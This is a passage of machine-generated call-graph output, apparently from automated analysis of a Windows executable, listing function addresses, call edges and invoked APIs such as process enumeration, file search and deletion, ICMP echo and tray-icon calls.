API calls 2 library calls 102368->102430 102371 cecf80 39 API calls 102371->102383 102372 d3179f 102372->102372 102375 cfe807 39 API calls 102375->102383 102376 cecdee 102378 d316e8 102433 d66669 81 API calls 102378->102433 102382->102376 102434 d53fe1 81 API calls __wsopen_s 102382->102434 102383->102371 102383->102375 102383->102376 102383->102378 102383->102382 102385 ceb4c8 8 API calls 102383->102385 102388 cebed9 8 API calls 102383->102388 102390 cf0340 102383->102390 102413 cebe2d 102383->102413 102417 cfe7c1 39 API calls 102383->102417 102418 cfaa99 207 API calls 102383->102418 102419 d005b2 5 API calls __Init_thread_wait 102383->102419 102420 cfbc58 102383->102420 102425 d00413 29 API calls __onexit 102383->102425 102426 d00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102383->102426 102427 cff4df 81 API calls 102383->102427 102428 cff346 207 API calls 102383->102428 102432 d3ffaf 8 API calls 102383->102432 102385->102383 102388->102383 102391 cf0376 ISource 102390->102391 102392 d00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 102391->102392 102393 d3632b 102391->102393 102394 d0014b 8 API calls 102391->102394 102395 cf049d ISource 102391->102395 102397 cf1695 102391->102397 102399 cebed9 8 API calls 102391->102399 102400 d35cdb 102391->102400 102401 d3625a 102391->102401 102407 d005b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102391->102407 102408 cebf73 8 API calls 102391->102408 102409 d00413 29 API calls pre_c_initialization 102391->102409 102410 d36115 102391->102410 102411 cf0aae ISource 102391->102411 102435 cf1990 102391->102435 102497 cf1e50 102391->102497 102392->102391 102510 d53fe1 81 API calls __wsopen_s 102393->102510 102394->102391 102395->102383 102397->102395 102402 cebed9 8 API calls 102397->102402 102399->102391 102400->102395 102406 cebed9 8 API calls 102400->102406 102509 d53fe1 81 API calls __wsopen_s 102401->102509 102402->102395 102406->102395 102407->102391 102408->102391 102409->102391 102507 d53fe1 81 API calls __wsopen_s 102410->102507 102508 d53fe1 81 API calls __wsopen_s 102411->102508 102414 cebe38 102413->102414 102415 cebe67 102414->102415 103282 cebfa5 102414->103282 102415->102383 102417->102383 102418->102383 102419->102383 102421 d0014b 8 API calls 102420->102421 102422 cfbc65 102421->102422 102423 ceb329 8 API calls 102422->102423 102424 cfbc70 102423->102424 102424->102383 102425->102383 102426->102383 102427->102383 102428->102383 102429->102368 102430->102382 102431->102383 102432->102383 102433->102382 102434->102372 102436 cf1a2e 102435->102436 102437 cf19b6 102435->102437 102440 d36a4d 102436->102440 102453 cf1a3d 102436->102453 102438 d36b60 102437->102438 102439 cf19c3 102437->102439 102517 d685db 207 API calls 2 library calls 102438->102517 102448 d36b84 102439->102448 102449 cf19cd 102439->102449 102442 d36b54 102440->102442 102443 d36a58 102440->102443 102516 d53fe1 81 API calls __wsopen_s 102442->102516 102515 cfb35c 207 API calls 102443->102515 102445 d36bb5 102450 d36be2 102445->102450 102451 d36bc0 102445->102451 102446 cf0340 207 API calls 102446->102453 102448->102445 102452 d36b9c 102448->102452 102458 cebed9 8 API calls 102449->102458 102482 cf19e0 ISource 102449->102482 102520 d660e6 102450->102520 102519 d685db 207 API calls 2 library calls 102451->102519 102518 d53fe1 81 API calls __wsopen_s 102452->102518 102453->102446 102454 d36979 102453->102454 102457 cf1bb5 102453->102457 102461 d36908 102453->102461 102472 cf1ba9 102453->102472 102480 cf1af4 102453->102480 102453->102482 102514 d53fe1 81 API calls __wsopen_s 102454->102514 102457->102391 102458->102482 102513 d53fe1 81 API calls __wsopen_s 102461->102513 102462 d36dd9 102467 d36e0f 102462->102467 102618 d681ce 65 API calls 102462->102618 102465 d36c81 102592 d51ad8 8 API calls 102465->102592 102470 ceb4c8 8 API calls 102467->102470 102468 d36db7 102595 ce8ec0 102468->102595 102495 cf1a23 ISource 102470->102495 102471 cebed9 8 API calls 102471->102482 102472->102457 102512 d53fe1 81 API calls __wsopen_s 102472->102512 102474 d36ded 102477 ce8ec0 52 API calls 102474->102477 102476 d36c08 102527 d5148b 102476->102527 102492 d36df5 _wcslen 102477->102492 102479 d36c93 102593 cebd07 8 API calls 102479->102593 102480->102472 102511 cf1ca0 8 API calls 102480->102511 102482->102462 102482->102495 102594 d6808f 53 API calls __wsopen_s 102482->102594 102485 cf1b55 102485->102472 102493 cf1b62 ISource 102485->102493 102486 d3691d ISource 102486->102454 102486->102493 102486->102495 102487 d36dbf _wcslen 102487->102462 102490 ceb4c8 8 API calls 102487->102490 102489 d36c9c 102496 d5148b 8 API calls 102489->102496 102490->102462 102492->102467 102494 ceb4c8 8 API calls 102492->102494 102493->102471 102493->102482 102493->102495 102494->102467 102495->102391 102496->102482 102499 cf1e6d ISource 102497->102499 102498 cf2512 102501 cf1ff7 ISource 102498->102501 103281 cfbe08 39 API calls 102498->103281 102499->102498 102499->102501 102503 d37837 102499->102503 102506 d3766b 102499->102506 103279 cfe322 8 API calls ISource 102499->103279 102501->102391 102503->102501 103280 d0d2d5 39 API calls 102503->103280 103278 d0d2d5 39 API calls 102506->103278 102507->102411 102508->102395 102509->102395 102510->102395 102511->102485 102512->102495 102513->102486 102514->102482 102515->102493 102516->102438 102517->102482 102518->102495 102519->102482 102521 d66101 102520->102521 102526 d36bed 102520->102526 102522 d0017b 8 API calls 102521->102522 102524 d66123 102522->102524 102523 d0014b 8 API calls 102523->102524 102524->102523 102524->102526 102619 d51400 8 API calls 102524->102619 102526->102465 102526->102476 102528 d36c32 102527->102528 102529 d51499 102527->102529 102531 cf2b20 102528->102531 102529->102528 102530 d0014b 8 API calls 102529->102530 102530->102528 102532 cf2b86 102531->102532 102533 cf2fc0 102531->102533 102535 d37bd8 102532->102535 102536 cf2ba0 102532->102536 102755 d005b2 5 API calls __Init_thread_wait 102533->102755 102718 d67af9 102535->102718 102539 cf3160 9 API calls 102536->102539 102538 cf2fca 102548 cf300b 102538->102548 102756 ceb329 102538->102756 102541 cf2bb0 102539->102541 102540 d37be4 102540->102482 102543 cf3160 9 API calls 102541->102543 102544 cf2bc6 102543->102544 102545 cf2bfc 102544->102545 102544->102548 102547 d37bfd 102545->102547 102573 cf2c18 __fread_nolock 102545->102573 102546 d37bed 102546->102482 102765 d53fe1 81 API calls __wsopen_s 102547->102765 102548->102546 102550 ceb4c8 8 API calls 102548->102550 102552 cf3049 102550->102552 102551 cf2fe4 102762 d00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102551->102762 102763 cfe6e8 207 API calls 102552->102763 102554 d37c15 102766 d53fe1 81 API calls __wsopen_s 102554->102766 102557 cf2d3f 102558 cf2d4c 102557->102558 102559 d37c78 102557->102559 102561 cf3160 9 API calls 102558->102561 102768 d661a2 53 API calls _wcslen 102559->102768 102563 cf2d59 102561->102563 102562 d0014b 8 API calls 102562->102573 102566 cf3160 9 API calls 102563->102566 102579 cf2dd7 ISource 102563->102579 102564 cf3082 102764 cffe39 8 API calls 102564->102764 102565 d0017b 8 API calls 102565->102573 102572 cf2d73 102566->102572 102568 cf2f2d 102568->102482 102570 cf30bd 102570->102482 102571 cf0340 207 API calls 102571->102573 102572->102579 102580 cebed9 8 API calls 102572->102580 102573->102552 102573->102554 102573->102557 102573->102562 102573->102565 102573->102571 102575 d37c59 102573->102575 102573->102579 102574 cf2e8b ISource 102574->102568 102754 cfe322 8 API calls ISource 102574->102754 102767 d53fe1 81 API calls __wsopen_s 102575->102767 102576 cf3160 9 API calls 102576->102579 102579->102564 102579->102574 102579->102576 102620 d5f94a 102579->102620 102629 d69fe8 102579->102629 102632 d6a5b2 102579->102632 102638 d6a6aa 102579->102638 102646 d5df45 102579->102646 102651 cfac3e 102579->102651 102670 d6ad47 102579->102670 102675 d5664c 102579->102675 102682 d69ffc 102579->102682 102685 d6a9ac 102579->102685 102693 d60fb8 102579->102693 102769 d53fe1 81 API calls __wsopen_s 102579->102769 102580->102579 102592->102479 102593->102489 102594->102468 102596 ce8ed5 102595->102596 102612 ce8ed2 102595->102612 102597 ce8edd 102596->102597 102598 ce8f0b 102596->102598 103274 d05536 26 API calls 102597->103274 102601 ce8f1d 102598->102601 102602 d26a38 102598->102602 102609 d26b1f 102598->102609 103275 cffe6f 51 API calls 102601->103275 102611 d0017b 8 API calls 102602->102611 102617 d26ab1 102602->102617 102603 ce8eed 102606 d0014b 8 API calls 102603->102606 102604 d26b37 102604->102604 102608 ce8ef7 102606->102608 102610 ceb329 8 API calls 102608->102610 103277 d054f3 26 API calls 102609->103277 102610->102612 102613 d26a81 102611->102613 102612->102487 102614 d0014b 8 API calls 102613->102614 102615 d26aa8 102614->102615 102616 ceb329 8 API calls 102615->102616 102616->102617 103276 cffe6f 51 API calls 102617->103276 102618->102474 102619->102524 102621 d0017b 8 API calls 102620->102621 102622 d5f95b 102621->102622 102770 ce423c 102622->102770 102625 ce8ec0 52 API calls 102626 d5f97c GetEnvironmentVariableW 102625->102626 102773 d5160f 8 API calls 102626->102773 102628 d5f999 ISource 102628->102579 102774 d689b6 102629->102774 102631 d69ff8 102631->102579 102636 d6a5c5 102632->102636 102633 ce8ec0 52 API calls 102634 d6a632 102633->102634 102899 d518a9 102634->102899 102636->102633 102637 d6a5d4 102636->102637 102637->102579 102640 d6a705 102638->102640 102645 d6a6c5 102638->102645 102639 d6a723 102643 d6a780 102639->102643 102639->102645 102976 cec98d 39 API calls 102639->102976 102640->102639 102975 cec98d 39 API calls 102640->102975 102943 d50372 102643->102943 102645->102579 102647 ceb4c8 8 API calls 102646->102647 102648 d5df58 102647->102648 103017 d51926 102648->103017 102650 d5df60 102650->102579 102652 ce8ec0 52 API calls 102651->102652 102653 cfac68 102652->102653 102654 cfbc58 8 API calls 102653->102654 102655 cfac7f 102654->102655 102663 cfb09b _wcslen 102655->102663 103061 cec98d 39 API calls 102655->103061 102657 cfbbbe 43 API calls 102657->102663 102658 d04d98 _strftime 40 API calls 102658->102663 102660 ce6c03 8 API calls 102660->102663 102663->102657 102663->102658 102663->102660 102664 cfb1fb 102663->102664 102665 cec98d 39 API calls 102663->102665 102666 ce8ec0 52 API calls 102663->102666 102667 ce8577 8 API calls 102663->102667 103047 ce396b 102663->103047 103057 ce3907 102663->103057 103062 ce7ad5 102663->103062 103067 cead40 8 API calls __fread_nolock 102663->103067 103068 ce7b1a 8 API calls 102663->103068 102664->102579 102665->102663 102666->102663 102667->102663 102671 ce8ec0 52 API calls 102670->102671 102672 d6ad63 102671->102672 103150 d4dd87 CreateToolhelp32Snapshot Process32FirstW 102672->103150 102674 d6ad72 102674->102579 102676 ce8ec0 52 API calls 102675->102676 102677 d56662 102676->102677 103218 d4dc54 102677->103218 102679 d5666a 102680 d5666e GetLastError 102679->102680 102681 d56683 102679->102681 102680->102681 102681->102579 102683 d689b6 119 API calls 102682->102683 102684 d6a00c 102683->102684 102684->102579 102687 d6a9c8 102685->102687 102688 d6aa08 102685->102688 102686 d6aa26 102686->102687 102690 d6aa8e 102686->102690 103261 cec98d 39 API calls 102686->103261 102687->102579 102688->102686 103260 cec98d 39 API calls 102688->103260 102692 d50372 58 API calls 102690->102692 102692->102687 102694 d60fe1 102693->102694 102695 d6100f WSAStartup 102694->102695 103267 cec98d 39 API calls 102694->103267 102697 d61054 102695->102697 102707 d61023 ISource 102695->102707 103262 cfc1f6 102697->103262 102699 d60ffc 102699->102695 103268 cec98d 39 API calls 102699->103268 102701 ce8ec0 52 API calls 102703 d61069 102701->102703 102705 cff9d4 10 API calls 102703->102705 102704 d6100b 102704->102695 102706 d61075 inet_addr gethostbyname 102705->102706 102706->102707 102708 d61093 IcmpCreateFile 102706->102708 102707->102579 102708->102707 102709 d610d3 102708->102709 102710 d0017b 8 API calls 102709->102710 102711 d610ec 102710->102711 102712 ce423c 8 API calls 102711->102712 102713 d610f7 102712->102713 102714 d61102 IcmpSendEcho 102713->102714 102715 d6112b IcmpSendEcho 102713->102715 102716 d6114c 102714->102716 102715->102716 102717 d61212 IcmpCloseHandle WSACleanup 102716->102717 102717->102707 102719 d67b52 102718->102719 102720 d67b38 102718->102720 102721 d660e6 8 API calls 102719->102721 103269 d53fe1 81 API calls __wsopen_s 102720->103269 102723 d67b5d 102721->102723 102724 cf0340 206 API calls 102723->102724 102725 d67bc1 102724->102725 102726 d67b4a 102725->102726 102727 d67c5c 102725->102727 102730 d67c03 102725->102730 102726->102540 102728 d67c62 102727->102728 102729 d67cb0 102727->102729 103270 d51ad8 8 API calls 102728->103270 102729->102726 102731 ce8ec0 52 API calls 102729->102731 102736 d5148b 8 API calls 102730->102736 102732 d67cc2 102731->102732 102734 cec2c9 8 API calls 102732->102734 102737 d67ce6 CharUpperBuffW 102734->102737 102735 d67c85 103271 cebd07 8 API calls 102735->103271 102739 d67c3b 102736->102739 102741 d67d00 102737->102741 102740 cf2b20 206 API calls 102739->102740 102740->102726 102742 d67d07 102741->102742 102743 d67d53 102741->102743 102747 d5148b 8 API calls 102742->102747 102744 ce8ec0 52 API calls 102743->102744 102745 d67d5b 102744->102745 103272 cfaa65 9 API calls 102745->103272 102748 d67d35 102747->102748 102749 cf2b20 206 API calls 102748->102749 102749->102726 102750 d67d65 102750->102726 102751 ce8ec0 52 API calls 102750->102751 102752 d67d80 102751->102752 103273 cebd07 8 API calls 102752->103273 102754->102574 102755->102538 102757 ceb338 _wcslen 102756->102757 102758 d0017b 8 API calls 102757->102758 102759 ceb360 __fread_nolock 102758->102759 102760 d0014b 8 API calls 102759->102760 102761 ceb376 102760->102761 102761->102551 102762->102548 102763->102564 102764->102570 102765->102579 102766->102579 102767->102579 102768->102572 102769->102579 102771 d0014b 8 API calls 102770->102771 102772 ce424e 102771->102772 102772->102625 102773->102628 102775 ce8ec0 52 API calls 102774->102775 102776 d689ed 102775->102776 102797 d68a32 ISource 102776->102797 102812 d69730 102776->102812 102778 d68cde 102779 d68eac 102778->102779 102784 d68cec 102778->102784 102861 d69941 59 API calls 102779->102861 102782 d68ebb 102783 d68ec7 102782->102783 102782->102784 102783->102797 102825 d688e3 102784->102825 102785 ce8ec0 52 API calls 102803 d68aa6 102785->102803 102790 d68d25 102839 cfffe0 102790->102839 102793 d68d45 102846 d53fe1 81 API calls __wsopen_s 102793->102846 102794 d68d5f 102847 ce7e12 102794->102847 102797->102631 102798 d68d50 GetCurrentProcess TerminateProcess 102798->102794 102803->102778 102803->102785 102803->102797 102844 d44ad3 8 API calls __fread_nolock 102803->102844 102845 d68f7a 41 API calls _strftime 102803->102845 102804 d68f22 102804->102797 102808 d68f36 FreeLibrary 102804->102808 102805 d68d9e 102859 d695d8 74 API calls 102805->102859 102808->102797 102810 d68daf 102810->102804 102811 ceb4c8 8 API calls 102810->102811 102860 cf1ca0 8 API calls 102810->102860 102862 d695d8 74 API calls 102810->102862 102811->102810 102813 cec2c9 8 API calls 102812->102813 102814 d6974b CharLowerBuffW 102813->102814 102863 d49805 102814->102863 102818 cebf73 8 API calls 102819 d69787 102818->102819 102870 ceacc0 102819->102870 102821 d6979b 102822 ceadf4 8 API calls 102821->102822 102824 d697a5 _wcslen 102822->102824 102823 d698bb _wcslen 102823->102803 102824->102823 102882 d68f7a 41 API calls _strftime 102824->102882 102826 d688fe 102825->102826 102830 d68949 102825->102830 102827 d0017b 8 API calls 102826->102827 102828 d68920 102827->102828 102829 d0014b 8 API calls 102828->102829 102828->102830 102829->102828 102831 d69af3 102830->102831 102832 d69d08 ISource 102831->102832 102838 d69b17 _strcat _wcslen ___std_exception_copy 102831->102838 102832->102790 102833 cec98d 39 API calls 102833->102838 102834 cec63f 39 API calls 102834->102838 102835 ceca5b 39 API calls 102835->102838 102836 ce8ec0 52 API calls 102836->102838 102838->102832 102838->102833 102838->102834 102838->102835 102838->102836 102886 d4f8c5 10 API calls _wcslen 102838->102886 102840 cffff5 102839->102840 102841 d0008d Sleep 102840->102841 102842 d0007b CloseHandle 102840->102842 102843 d0005b 102840->102843 102841->102843 102842->102843 102843->102793 102843->102794 102844->102803 102845->102803 102846->102798 102848 ce7e1a 102847->102848 102849 d0014b 8 API calls 102848->102849 102850 ce7e28 102849->102850 102887 ce8445 102850->102887 102853 ce8470 102890 cec760 102853->102890 102855 d0017b 8 API calls 102857 ce851c 102855->102857 102856 ce8480 102856->102855 102856->102857 102857->102810 102858 cf1ca0 8 API calls 102857->102858 102858->102805 102859->102810 102860->102810 102861->102782 102862->102810 102865 d49825 _wcslen 102863->102865 102864 d49914 102864->102818 102864->102824 102865->102864 102867 d4985a 102865->102867 102869 d49919 102865->102869 102867->102864 102883 cfe36b 41 API calls 102867->102883 102869->102864 102884 cfe36b 41 API calls 102869->102884 102873 ceace1 102870->102873 102881 ceaccf 102870->102881 102871 ceacda __fread_nolock 102871->102821 102872 cec2c9 8 API calls 102874 d305a3 __fread_nolock 102872->102874 102875 d30557 102873->102875 102876 cead07 102873->102876 102873->102881 102878 d0014b 8 API calls 102875->102878 102885 ce88e8 8 API calls 102876->102885 102879 d30561 102878->102879 102880 d0017b 8 API calls 102879->102880 102880->102881 102881->102871 102881->102872 102882->102823 102883->102867 102884->102869 102885->102871 102886->102838 102888 d0014b 8 API calls 102887->102888 102889 ce7e30 102888->102889 102889->102853 102891 cec76b 102890->102891 102892 d31285 102891->102892 102896 cec773 ISource 102891->102896 102893 d0014b 8 API calls 102892->102893 102895 d31291 102893->102895 102894 cec77a 102894->102856 102896->102894 102898 cec7e0 8 API calls ISource 102896->102898 102898->102896 102900 d518b6 102899->102900 102901 d0014b 8 API calls 102900->102901 102902 d518bd 102901->102902 102905 d4fcb5 102902->102905 102904 d518f7 102904->102637 102906 cec2c9 8 API calls 102905->102906 102907 d4fcc8 CharLowerBuffW 102906->102907 102911 d4fcdb 102907->102911 102908 ce655e 8 API calls 102908->102911 102909 d4fd19 102910 d4fd2b 102909->102910 102938 ce655e 102909->102938 102913 d0017b 8 API calls 102910->102913 102911->102908 102911->102909 102922 d4fce5 ___scrt_fastfail 102911->102922 102916 d4fd59 102913->102916 102918 d4fd7b 102916->102918 102941 d4fbed 8 API calls 102916->102941 102917 d4fdb8 102919 d0014b 8 API calls 102917->102919 102917->102922 102923 d4fe0c 102918->102923 102920 d4fdd2 102919->102920 102921 d0017b 8 API calls 102920->102921 102921->102922 102922->102904 102924 cebf73 8 API calls 102923->102924 102925 d4fe3e 102924->102925 102926 cebf73 8 API calls 102925->102926 102927 d4fe47 102926->102927 102928 cebf73 8 API calls 102927->102928 102935 d4fe50 102928->102935 102929 d066f8 GetStringTypeW 102929->102935 102930 d50114 102930->102917 102931 cead40 8 API calls 102931->102935 102932 ce8577 8 API calls 102932->102935 102934 d4fe0c 40 API calls 102934->102935 102935->102929 102935->102930 102935->102931 102935->102932 102935->102934 102936 d06641 39 API calls 102935->102936 102937 cebed9 8 API calls 102935->102937 102942 d06722 GetStringTypeW _strftime 102935->102942 102936->102935 102937->102935 102939 cec2c9 8 API calls 102938->102939 102940 ce6569 102939->102940 102940->102910 102941->102916 102942->102935 102977 d502aa 102943->102977 102945 d50399 __fread_nolock 102945->102645 102947 d503f3 102993 d505e9 56 API calls __fread_nolock 102947->102993 102948 d5040b 102950 d50471 102948->102950 102953 d5041b 102948->102953 102950->102945 102951 d50507 102950->102951 102952 d504a1 102950->102952 102955 d505b0 102951->102955 102956 d50510 102951->102956 102954 d504d1 102952->102954 102963 d504a6 102952->102963 102974 d50453 102953->102974 102994 d52855 10 API calls 102953->102994 102954->102945 102998 ceca5b 39 API calls 102954->102998 102955->102945 103002 cec63f 39 API calls 102955->103002 102957 d50515 102956->102957 102959 d5058d 102956->102959 102966 d5051b 102957->102966 102967 d50554 102957->102967 102959->102945 103001 cec63f 39 API calls 102959->103001 102963->102945 102997 ceca5b 39 API calls 102963->102997 102966->102945 102999 cec63f 39 API calls 102966->102999 102967->102945 103000 cec63f 39 API calls 102967->103000 102969 d50427 102995 d52855 10 API calls 102969->102995 102972 d5043e __fread_nolock 102996 d52855 10 API calls 102972->102996 102984 d51844 102974->102984 102975->102639 102976->102643 102978 d502f7 102977->102978 102982 d502bb 102977->102982 103013 cec98d 39 API calls 102978->103013 102979 d502f5 102979->102945 102979->102947 102979->102948 102981 ce8ec0 52 API calls 102981->102982 102982->102979 102982->102981 103003 d04d98 102982->103003 102985 d5184f 102984->102985 102986 d0014b 8 API calls 102985->102986 102987 d51856 102986->102987 102988 d51883 102987->102988 102989 d51862 102987->102989 102991 d0017b 8 API calls 102988->102991 102990 d0017b 8 API calls 102989->102990 102992 d5186b ___scrt_fastfail 102990->102992 102991->102992 102992->102945 102993->102945 102994->102969 102995->102972 102996->102974 102997->102945 102998->102945 102999->102945 103000->102945 103001->102945 103002->102945 103004 d04da6 103003->103004 103005 d04e1b 103003->103005 103012 d04dcb 103004->103012 103014 d0f649 20 API calls __dosmaperr 103004->103014 103016 d04e2d 40 API calls 3 library calls 103005->103016 103008 d04e28 103008->102982 103009 d04db2 103015 d12b5c 26 API calls pre_c_initialization 103009->103015 103011 d04dbd 103011->102982 103012->102982 103013->102979 103014->103009 103015->103011 103016->103008 103018 d5193d 103017->103018 103033 d51a56 103017->103033 103019 d5195d 103018->103019 103020 d5198a 103018->103020 103023 d519a1 103018->103023 103019->103020 103025 d51971 103019->103025 103021 d0017b 8 API calls 103020->103021 103022 d5197f __fread_nolock 103021->103022 103031 d0014b 8 API calls 103022->103031 103024 d519be 103023->103024 103026 d0017b 8 API calls 103023->103026 103024->103022 103024->103025 103027 d519e5 103024->103027 103028 d0017b 8 API calls 103025->103028 103026->103024 103029 d0017b 8 API calls 103027->103029 103028->103022 103030 d519eb 103029->103030 103036 cfc277 8 API calls 103030->103036 103031->103033 103033->102650 103034 d519f7 103037 cff9d4 WideCharToMultiByte 103034->103037 103036->103034 103038 cff9fe 103037->103038 103039 cffa35 103037->103039 103041 d0017b 8 API calls 103038->103041 103046 cffe8a 8 API calls 103039->103046 103043 cffa05 WideCharToMultiByte 103041->103043 103042 cffa29 103042->103022 103045 cffa3e 8 API calls __fread_nolock 103043->103045 103045->103042 103046->103042 103048 ce3996 ___scrt_fastfail 103047->103048 103069 ce5f32 103048->103069 103051 ce3a1c 103053 ce3a3a Shell_NotifyIconW 103051->103053 103054 d240cd Shell_NotifyIconW 103051->103054 103073 ce61a9 103053->103073 103056 ce3a50 103056->102663 103058 ce3969 103057->103058 103059 ce3919 ___scrt_fastfail 103057->103059 103058->102663 103060 ce3938 Shell_NotifyIconW 103059->103060 103060->103058 103061->102663 103063 d0017b 8 API calls 103062->103063 103064 ce7afa 103063->103064 103065 d0014b 8 API calls 103064->103065 103066 ce7b08 103065->103066 103066->102663 103067->102663 103068->102663 103070 ce5f4e 103069->103070 103071 ce39eb 103069->103071 103070->103071 103072 d25070 DestroyIcon 103070->103072 103071->103051 103103 d4d11f 42 API calls _strftime 103071->103103 103072->103071 103074 ce61c6 103073->103074 103092 ce62a8 103073->103092 103075 ce7ad5 8 API calls 103074->103075 103076 ce61d4 103075->103076 103077 d25278 LoadStringW 103076->103077 103078 ce61e1 103076->103078 103081 d25292 103077->103081 103079 ce8577 8 API calls 103078->103079 103080 ce61f6 103079->103080 103082 ce6203 103080->103082 103089 d252ae 103080->103089 103084 cebed9 8 API calls 103081->103084 103088 ce6229 ___scrt_fastfail 103081->103088 103082->103081 103083 ce620d 103082->103083 103104 ce6b7c 103083->103104 103084->103088 103090 ce628e Shell_NotifyIconW 103088->103090 103089->103088 103091 cebf73 8 API calls 103089->103091 103101 d252f1 103089->103101 103090->103092 103093 d252d8 103091->103093 103092->103056 103122 d4a350 9 API calls 103093->103122 103096 d25310 103098 ce6b7c 8 API calls 103096->103098 103097 d252e3 103099 ce7bb5 8 API calls 103097->103099 103100 d25321 103098->103100 103099->103101 103102 ce6b7c 8 API calls 103100->103102 103123 cffe6f 51 API calls 103101->103123 103102->103088 103103->103051 103105 d257fe 103104->103105 103106 ce6b93 103104->103106 103108 d0014b 8 API calls 103105->103108 103124 ce6ba4 103106->103124 103110 d25808 _wcslen 103108->103110 103109 ce621b 103113 ce7bb5 103109->103113 103111 d0017b 8 API calls 103110->103111 103112 d25841 __fread_nolock 103111->103112 103114 ce7bc7 103113->103114 103115 d2641d 103113->103115 103139 ce7bd8 103114->103139 103149 d413c8 8 API calls __fread_nolock 103115->103149 103118 ce7bd3 103118->103088 103119 d26427 103120 d26433 103119->103120 103121 cebed9 8 API calls 103119->103121 103121->103120 103122->103097 103123->103096 103125 ce6bb4 _wcslen 103124->103125 103126 d25860 103125->103126 103127 ce6bc7 103125->103127 103129 d0014b 8 API calls 103126->103129 103134 ce7d74 103127->103134 103131 d2586a 103129->103131 103130 ce6bd4 __fread_nolock 103130->103109 103132 d0017b 8 API calls 103131->103132 103133 d2589a __fread_nolock 103132->103133 103135 ce7d85 __fread_nolock 103134->103135 103136 ce7d8a 103134->103136 103135->103130 103137 d26528 103136->103137 103138 d0017b 8 API calls 103136->103138 103138->103135 103140 ce7be7 103139->103140 103146 ce7c1b __fread_nolock 103139->103146 103141 d2644e 103140->103141 103142 ce7c0e 103140->103142 103140->103146 103143 d0014b 8 API calls 103141->103143 103144 ce7d74 8 API calls 103142->103144 103145 d2645d 103143->103145 103144->103146 103147 d0017b 8 API calls 103145->103147 103146->103118 103148 d26491 __fread_nolock 103147->103148 103149->103119 103160 d4e80e 103150->103160 103152 d4ddd4 Process32NextW 103153 d4de86 CloseHandle 103152->103153 103159 d4ddcd 103152->103159 103153->102674 103154 cebf73 8 API calls 103154->103159 103155 ceb329 8 API calls 103155->103159 103157 ce7bb5 8 API calls 103157->103159 103159->103152 103159->103153 103159->103154 103159->103155 103159->103157 103166 ce568e 103159->103166 103208 cfe36b 41 API calls 103159->103208 103161 d4e819 103160->103161 103162 d4e830 103161->103162 103165 d4e836 103161->103165 103209 d06722 GetStringTypeW _strftime 103161->103209 103210 d0666b 39 API calls _strftime 103162->103210 103165->103159 103167 cebf73 8 API calls 103166->103167 103168 ce56a4 103167->103168 103169 cebf73 8 API calls 103168->103169 103170 ce56ac 103169->103170 103171 cebf73 8 API calls 103170->103171 103172 ce56b4 103171->103172 103173 cebf73 8 API calls 103172->103173 103174 ce56bc 103173->103174 103175 d24da1 103174->103175 103176 ce56f0 103174->103176 103177 cebed9 8 API calls 103175->103177 103178 ceacc0 8 API calls 103176->103178 103179 d24daa 103177->103179 103180 ce56fe 103178->103180 103211 cebd57 103179->103211 103182 ceadf4 8 API calls 103180->103182 103183 ce5708 103182->103183 103184 ceacc0 8 API calls 103183->103184 103186 ce5733 103183->103186 103187 ce5729 103184->103187 103185 ce5778 103189 ceacc0 8 API calls 103185->103189 103186->103185 103188 ce5754 103186->103188 103194 d24dcc 103186->103194 103191 ceadf4 8 API calls 103187->103191 103188->103185 103193 ce655e 8 API calls 103188->103193 103190 ce5789 103189->103190 103192 ce579f 103190->103192 103198 cebed9 8 API calls 103190->103198 103191->103186 103195 ce57b3 103192->103195 103200 cebed9 8 API calls 103192->103200 103196 ce5761 103193->103196 103197 ce8577 8 API calls 103194->103197 103199 ce57be 103195->103199 103202 cebed9 8 API calls 103195->103202 103196->103185 103201 ceacc0 8 API calls 103196->103201 103204 d24e8c 103197->103204 103198->103192 103203 cebed9 8 API calls 103199->103203 103205 ce57c9 103199->103205 103200->103195 103201->103185 103202->103199 103203->103205 103204->103185 103206 ce655e 8 API calls 103204->103206 103217 cead40 8 API calls __fread_nolock 103204->103217 103205->103159 103206->103204 103208->103159 103209->103161 103210->103165 103212 cebd64 103211->103212 103213 cebd71 103211->103213 103212->103186 103214 d0014b 8 API calls 103213->103214 103215 cebd7b 103214->103215 103216 d0017b 8 API calls 103215->103216 103216->103212 103217->103204 103219 cebf73 8 API calls 103218->103219 103220 d4dc73 103219->103220 103221 cebf73 8 API calls 103220->103221 103222 d4dc7c 103221->103222 103223 cebf73 8 API calls 103222->103223 103224 d4dc85 103223->103224 103242 ce5851 103224->103242 103229 d4dcab 103231 ce568e 8 API calls 103229->103231 103230 ce6b7c 8 API calls 103230->103229 103232 d4dcbf FindFirstFileW 103231->103232 103233 d4dd4b FindClose 103232->103233 103236 d4dcde 103232->103236 103238 d4dd56 103233->103238 103234 d4dd26 FindNextFileW 103234->103236 103235 cebed9 8 API calls 103235->103236 103236->103233 103236->103234 103236->103235 103237 ce7bb5 8 API calls 103236->103237 103239 ce6b7c 8 API calls 103236->103239 103237->103236 103238->102679 103240 d4dd17 DeleteFileW 103239->103240 103240->103234 103241 d4dd42 FindClose 103240->103241 103241->103238 103254 d222d0 103242->103254 103245 ce587d 103248 ce8577 8 API calls 103245->103248 103246 ce5898 103247 cebd57 8 API calls 103246->103247 103249 ce5889 103247->103249 103248->103249 103256 ce55dc 103249->103256 103252 d4eab0 GetFileAttributesW 103253 d4dc99 103252->103253 103253->103229 103253->103230 103255 ce585e GetFullPathNameW 103254->103255 103255->103245 103255->103246 103257 ce55ea 103256->103257 103258 ceadf4 8 API calls 103257->103258 103259 ce55fe 103258->103259 103259->103252 103260->102686 103261->102690 103263 d0017b 8 API calls 103262->103263 103264 cfc209 103263->103264 103265 d0014b 8 API calls 103264->103265 103266 cfc215 103265->103266 103266->102701 103267->102699 103268->102704 103269->102726 103270->102735 103271->102726 103272->102750 103273->102726 103274->102603 103275->102603 103276->102609 103277->102604 103278->102506 103279->102499 103280->102501 103281->102501 103299 cecf80 103282->103299 103284 cebfb5 103285 d30db6 103284->103285 103286 cebfc3 103284->103286 103287 ceb4c8 8 API calls 103285->103287 103288 d0014b 8 API calls 103286->103288 103290 d30dc1 103287->103290 103289 cebfd4 103288->103289 103291 cebf73 8 API calls 103289->103291 103292 cebfde 103291->103292 103293 cebfed 103292->103293 103294 cebed9 8 API calls 103292->103294 103295 d0014b 8 API calls 103293->103295 103294->103293 103296 cebff7 103295->103296 103307 cebe7b 